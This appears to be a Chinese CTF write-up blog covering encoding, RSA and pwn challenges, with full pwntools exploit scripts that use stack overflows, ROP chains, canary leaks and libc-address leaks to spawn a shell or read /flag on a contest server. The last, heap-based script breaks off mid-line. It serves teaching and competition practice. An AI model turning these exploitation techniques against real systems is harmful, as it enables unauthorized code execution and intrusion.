<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5</span><br></pre></td></tr></table></figure>
<p>base32 串解码得</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==</span><br></pre></td></tr></table></figure>
<p>base64 解码得</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">W^7?+dsi@bUwJTfUt=_GUvgz(F)?&#123;xWow~0IWHD&#125;MA$&lt;</span><br></pre></td></tr></table></figure>
<p>base85 解码得<br>flag{W0w_y0u_c4n_rea11y_enc0d1ng!}</p>
<ul>
<li><h2 id="babyrsa"><a href="#babyrsa" class="headerlink" title="babyrsa"></a>babyrsa</h2>题目：<br><img src="https://img-blog.csdnimg.cn/9fb2dc871484406e8492f29807f1a93f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>hint1 就是 p 的高 300 位，hint2 就是 q 的低位，想到高位攻击，可是高位攻击一般需要其中一个因子已知的 570 位，根据q 的低位求出 p 的低位，再爆破点比特位就行了。由此得到 p 的低位 p0，结合高位攻击.<br>EXP：<br><img src="https://img-blog.csdnimg.cn/dff7ba0416bd4ee2b28631460923efbf.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></li>
<li><h2 id="Crazy-Rsa-Tech"><a href="#Crazy-Rsa-Tech" class="headerlink" title="Crazy_Rsa_Tech"></a>Crazy_Rsa_Tech</h2>题目：<br><img src="https://img-blog.csdnimg.cn/02f73fb390c64eddb7157658ed8bb014.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>EXP：<br><img src="https://img-blog.csdnimg.cn/0e0137dd63fe4ddfbebde03186c1ccc3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/d473618ae34b4aa78f260e69c0edaea0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></li>
</ul>
<ul>
<li><h2 id="little-of"><a href="#little-of" class="headerlink" title="little of"></a>little of</h2>EXP：<br><img src="https://img-blog.csdnimg.cn/e885e24bfcfe4a039f6f1246ea8c5ece.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/e53dcf297b804df9bc8b0dd1e0a6ffd3.png" alt="在这里插入图片描述"></li>
<li><h2 id="Babyof"><a href="#Babyof" class="headerlink" title="Babyof"></a>Babyof</h2>EXP：<br><img src="https://img-blog.csdnimg.cn/809017b9a81745b28962b4d84646da18.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5LiD5aCH5aKo5bm0,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></li>
<li><h2 id="PWN1"><a href="#PWN1" class="headerlink" title="PWN1"></a>PWN1</h2>签到题，栈溢出，构造 rop 去 getshell</li>
</ul>
<p><strong>EXP</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">ip = <span class="string">&quot;182.116.62.85&quot;</span></span><br><span class="line">port = <span class="number">21613</span></span><br><span class="line">io = remote(ip,port)</span><br><span class="line"><span class="comment">#io = process(&#x27;./baby0f&#x27;)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./baby0f&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc-2.27.so&#x27;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;)</span></span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0x0000000000400743: pop rdi; ret;</span></span><br><span class="line"><span class="string">0x0000000000400741: pop rsi; pop r15; ret;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">pop_rdi_ret = <span class="number">0x0400743</span></span><br><span class="line">main_addr = <span class="number">0x040066B</span></span><br><span class="line">pop_rsi_r15_ret = <span class="number">0x0400741</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x40</span> + <span class="string">b&#x27;b&#x27;</span>*<span class="number">8</span></span><br><span class="line">payload += p64(pop_rdi_ret)</span><br><span class="line">payload += p64(elf.got[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line">payload += p64(elf.plt[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line">payload += p64(main_addr)</span><br><span class="line">io.recvuntil(<span class="string">&quot;?&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">leak =</span><br><span class="line">u64(io.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">libc_base = leak - libc.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">libc_execv = libc_base + libc.symbols[<span class="string">&#x27;execv&#x27;</span>]</span><br><span class="line">binsh_addr = libc_base +</span><br><span class="line">libc.search(<span class="string">&#x27;/bin/sh\x00&#x27;</span>).<span class="built_in">next</span>()</span><br><span class="line">log.success(<span class="string">&quot;leak_puts ==&gt; 0x%x&quot;</span> % leak)</span><br><span class="line">log.success(<span class="string">&quot;leak_base ==&gt; 0x%x&quot;</span> % libc_base)</span><br><span class="line">log.success(<span class="string">&quot;leak_execv ==&gt; 0x%x&quot;</span> % libc_execv)</span><br><span class="line">log.success(<span class="string">&quot;binsh_addr ==&gt; 0x%x&quot;</span> % binsh_addr)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x40</span> + <span class="string">b&#x27;b&#x27;</span>*<span class="number">8</span></span><br><span class="line">payload += p64(pop_rdi_ret)</span><br><span class="line">payload += p64(binsh_addr)</span><br><span class="line">payload += p64(pop_rsi_r15_ret)</span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">payload += p64(libc_execv)</span><br><span class="line">io.recvuntil(<span class="string">&quot;?&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<ul>
<li><h2 id="PWN2"><a href="#PWN2" class="headerlink" title="PWN2"></a>PWN2</h2>比 pwn1 多了一个 canary，第一次输入直接写</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">ip = <span class="string">&quot;182.116.62.85&quot;</span></span><br><span class="line">port = <span class="number">27056</span></span><br><span class="line">io = remote(ip,port)</span><br><span class="line"><span class="comment">#io = process(&#x27;./littleof&#x27;)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./littleof&#x27;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&#x27;./libc-2.27.so&#x27;)</span></span><br><span class="line">libc = ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0x0000000000400863: pop rdi; ret;</span></span><br><span class="line"><span class="string">0x0000000000400861: pop rsi; pop r15; ret;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">pop_rdi_ret = <span class="number">0x0400863</span></span><br><span class="line">main_addr = <span class="number">0x0400789</span></span><br><span class="line">pop_rsi_r15_ret = <span class="number">0x0400861</span></span><br><span class="line">payload = <span class="string">b&#x27;&#x27;</span></span><br><span class="line">payload += <span class="string">b&#x27;A&#x27;</span>*(<span class="number">0x50</span>-<span class="number">8</span>)</span><br><span class="line">io.recvuntil(<span class="string">&quot;?&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recvuntil(<span class="string">&quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span></span><br><span class="line"><span class="string">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;</span>)</span><br><span class="line">canary = u64(io.recv(<span class="number">8</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">canary = canary - <span class="number">0x0a</span></span><br><span class="line">success(<span class="built_in">hex</span>(canary))</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x50</span>-<span class="number">8</span>) + p64(canary) + <span class="string">b&#x27;b&#x27;</span>*<span class="number">8</span></span><br><span class="line">payload += p64(pop_rdi_ret)</span><br><span class="line">payload += p64(elf.got[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line">payload += p64(elf.plt[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line">payload += p64(main_addr)</span><br><span class="line">io.recvuntil(<span class="string">&quot;!&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">leak =</span><br><span class="line">u64(io.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">libc_base = leak - libc.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">libc_execv = libc_base + libc.symbols[<span class="string">&#x27;execv&#x27;</span>]</span><br><span class="line">binsh_addr = libc_base +</span><br><span class="line">libc.search(<span class="string">&#x27;/bin/sh\x00&#x27;</span>).<span class="built_in">next</span>()</span><br><span class="line">log.success(<span class="string">&quot;leak_puts ==&gt; 0x%x&quot;</span> % leak)</span><br><span class="line">log.success(<span class="string">&quot;leak_base ==&gt; 0x%x&quot;</span> % libc_base)</span><br><span class="line">log.success(<span class="string">&quot;leak_execv ==&gt; 0x%x&quot;</span> % libc_execv)</span><br><span class="line">log.success(<span class="string">&quot;binsh_addr ==&gt; 0x%x&quot;</span> % binsh_addr)</span><br><span class="line">payload = <span class="string">&#x27;&#x27;</span></span><br><span class="line">payload += <span class="string">b&#x27;A&#x27;</span>*(<span class="number">0x50</span>-<span class="number">8</span>)</span><br><span class="line">io.recvuntil(<span class="string">&quot;?&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recvuntil(<span class="string">&quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span></span><br><span class="line"><span class="string">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;</span>)</span><br><span class="line">canary = u64(io.recv(<span class="number">8</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">canary = canary - <span class="number">0x0a</span></span><br><span class="line">success(<span class="built_in">hex</span>(canary))</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x50</span>-<span class="number">8</span>) + p64(canary) + <span class="string">b&#x27;b&#x27;</span>*<span class="number">8</span></span><br><span class="line">payload += p64(pop_rdi_ret)</span><br><span class="line">payload += p64(binsh_addr)</span><br><span class="line">payload += p64(pop_rsi_r15_ret)</span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">payload += p64(libc_execv)</span><br><span class="line">io.recvuntil(<span class="string">&quot;!&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line"><span class="comment">#gdb.attach(io)</span></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<ul>
<li><h2 id="PWN3"><a href="#PWN3" class="headerlink" title="PWN3"></a>PWN3</h2>pwn3 栈溢出，开了沙箱，需要写 orw 去读 flag</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&#x27;debu&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;i386&#x27;</span></span><br><span class="line">io = process(<span class="string">&quot;./onecho&quot;</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./onecho&quot;</span>)</span><br><span class="line">libc =</span><br><span class="line">ELF(<span class="string">&quot;/libs/2.31-0ubuntu9.2_i386/libc-2.31.so&quot;</span>)</span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">main = <span class="number">0x804966e</span></span><br><span class="line">bss = elf.bss() + <span class="number">0x500</span></span><br><span class="line">pop_ret = <span class="number">0x08049022</span></span><br><span class="line">pop2_ret = <span class="number">0x8049812</span></span><br><span class="line">pop3_ret = <span class="number">0x8049811</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span> * <span class="number">0x110</span> + p32(pop_ret) + p32(bss) +</span><br><span class="line">p32(puts_plt) + p32(main) + p32(puts_got)</span><br><span class="line">io.sendlineafter(<span class="string">&quot;name:&quot;</span>, payload)</span><br><span class="line">io.recvline()</span><br><span class="line">libc_base = u32(io.recv(<span class="number">4</span>)) - libc.sym[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">success(<span class="string">&quot;libc_base-&gt;&quot;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line">open_adr = libc_base + libc.sym[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line">read_adr = libc_base + libc.sym[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">write_adr = libc_base + libc.sym[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">payload = <span class="string">b&#x27;/flag\x00&#x27;</span>.ljust(<span class="number">0x110</span>, <span class="string">&#x27;\x00&#x27;</span>) +</span><br><span class="line">p32(pop2_ret) + p32(bss) + p32(<span class="number">0x100</span>)</span><br><span class="line">payload += p32(open_adr) + p32(pop2_ret) + p32(bss) +</span><br><span class="line">p32(<span class="number">0</span>)</span><br><span class="line">payload += p32(read_adr) + p32(pop3_ret) + p32(<span class="number">3</span>) +</span><br><span class="line">p32(bss + <span class="number">0x100</span>) + p32(<span class="number">0x50</span>)</span><br><span class="line">payload += p32(write_adr) + p32(<span class="number">0</span>) + p32(<span class="number">1</span>) + p32(bss</span><br><span class="line"> + <span class="number">0x100</span>) + p32(<span class="number">0x50</span>)</span><br><span class="line">io.sendlineafter(<span class="string">&quot;name:&quot;</span>, payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<ul>
<li><h2 id="PWN4"><a href="#PWN4" class="headerlink" title="PWN4"></a>PWN4</h2>利用__stack_chk_fail（），将 flag 打印在报错位置</li>
</ul>
<p><strong>EXP</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">ip = <span class="string">&quot;182.116.62.85&quot;</span></span><br><span class="line">port = <span class="number">24842</span></span><br><span class="line">io = remote(ip,port)</span><br><span class="line"><span class="comment">#io = process(&#x27;./easyecho&#x27;)</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./easyecho&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">io.recvuntil(<span class="string">&quot;Name:&quot;</span>)</span><br><span class="line">io.send(<span class="string">b&#x27;A&#x27;</span> * <span class="number">16</span>)</span><br><span class="line">io.recvuntil(<span class="string">&quot;Welcome AAAAAAAAAAAAAAAA&quot;</span>)</span><br><span class="line">leak = u64(io.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">pie_base = leak - <span class="number">0xcf0</span></span><br><span class="line">success(<span class="built_in">hex</span>(leak))</span><br><span class="line">success(<span class="built_in">hex</span>(pie_base))</span><br><span class="line">flag = pie_base + <span class="number">0x0202040</span></span><br><span class="line">io.recvuntil(<span class="string">&quot;Input:&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">&#x27;backdoor&#x27;</span>)</span><br><span class="line">io.recvuntil(<span class="string">&quot;Input:&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">b&#x27;a&#x27;</span> * <span class="number">352</span> + p64(<span class="number">0</span>) + p64(flag))</span><br><span class="line"><span class="comment"># gdb.attach(io)</span></span><br><span class="line">io.recvuntil(<span class="string">&quot;Input:&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">&#x27;exitexit&#x27;</span>)</span><br><span class="line"><span class="comment"># gdb.attach(io)</span></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<ul>
<li><h2 id="PWN5"><a href="#PWN5" class="headerlink" title="PWN5"></a>PWN5</h2>2018 年国赛原题，libc 用的是 buu 的 32 位 libc2.23 的<br>原 exp 链接</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.freesion.com/article/5410126051/</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> time <span class="keyword">import</span> sleep</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">context.terminal = [<span class="string">&#x27;tmux&#x27;</span>, <span class="string">&#x27;splitw&#x27;</span>, <span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line"><span class="comment"># p = process(&quot;./task_supermarket&quot;)</span></span><br><span class="line">p = remote(<span class="string">&quot;182.116.62.85&quot;</span>, <span class="number">27518</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">name, price, descrip_size, description</span>):</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;your choice&gt;&gt; &quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">p.sendline(name)</span><br><span class="line">p.recvuntil(<span class="string">&quot;price:&quot;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(price))</span><br><span class="line">p.recvuntil(<span class="string">&quot;descrip_size:&quot;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(descrip_size))</span><br><span class="line">p.recvuntil(<span class="string">&quot;description:&quot;</span>)</span><br><span class="line">p.send(description)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">name</span>):</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;your choice&gt;&gt; &quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">p.sendline(name)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">list</span>():</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;your choice&gt;&gt; &quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_price</span>(<span class="params">name, value</span>):</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;your choice&gt;&gt; &quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">p.sendline(name)</span><br><span class="line">p.recvuntil(<span class="string">&quot;input the value you want to cut or</span></span><br><span class="line"><span class="string">rise in:&quot;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(value))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_desc</span>(<span class="params">name, descrip_size, description</span>):</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;your choice&gt;&gt; &quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;5&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;name:&quot;</span>)</span><br><span class="line">p.sendline(name)</span><br><span class="line">p.recvuntil(<span class="string">&quot;descrip_size:&quot;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(descrip_size))</span><br><span class="line">p.recvuntil(<span class="string">&quot;description:&quot;</span>)</span><br><span class="line">p.send(description)</span><br><span class="line">add(<span class="string">&#x27;0&#x27;</span>, <span class="number">80</span>, <span class="number">0x1c</span>, <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">add(<span class="string">&#x27;1&#x27;</span>, <span class="number">80</span>, <span class="number">0x1c</span>, <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">add(<span class="string">&#x27;2&#x27;</span>, <span class="number">80</span>, <span class="number">0x1c</span>, <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">add(<span class="string">&#x27;3&#x27;</span>, <span class="number">80</span>, <span class="number">0x1c</span>, <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">change_desc(<span class="string">&#x27;1&#x27;</span>, <span class="number">0x30</span>, <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">add(<span class="string">&#x27;4&#x27;</span>, <span class="number">80</span>, <span class="number">0x1c</span>, <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">add(<span class="string">&#x27;5&#x27;</span>, <span class="number">80</span>, <span class="number">0x80</span>, <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">read_got = <span class="number">0x0804B010</span></span><br><span class="line">atoi_got = <span class="number">0x0804B048</span></span><br><span class="line">payload = p32(<span class="number">0x34</span>)</span><br><span class="line">payload += p32(<span class="number">0</span>) * <span class="number">3</span></span><br><span class="line">payload += p32(<span class="number">0x50</span>)</span><br><span class="line">payload += <span class="string">&#x27;\x90\n&#x27;</span></span><br><span class="line">change_desc(<span class="string">&#x27;1&#x27;</span>, <span class="number">0x1c</span>, payload)</span><br><span class="line">payload = <span class="string">&#x27;\x00&#x27;</span> * (<span class="number">0x20</span> - <span class="number">8</span>)</span><br><span class="line">payload += p32(<span class="number">0</span>)</span><br><span class="line">payload += p32(<span class="number">0x21</span>)</span><br><span class="line">payload += p32(<span class="number">0x35</span>)</span><br><span class="line">payload += p32(<span class="number">0</span>) * <span class="number">3</span></span><br><span class="line">payload 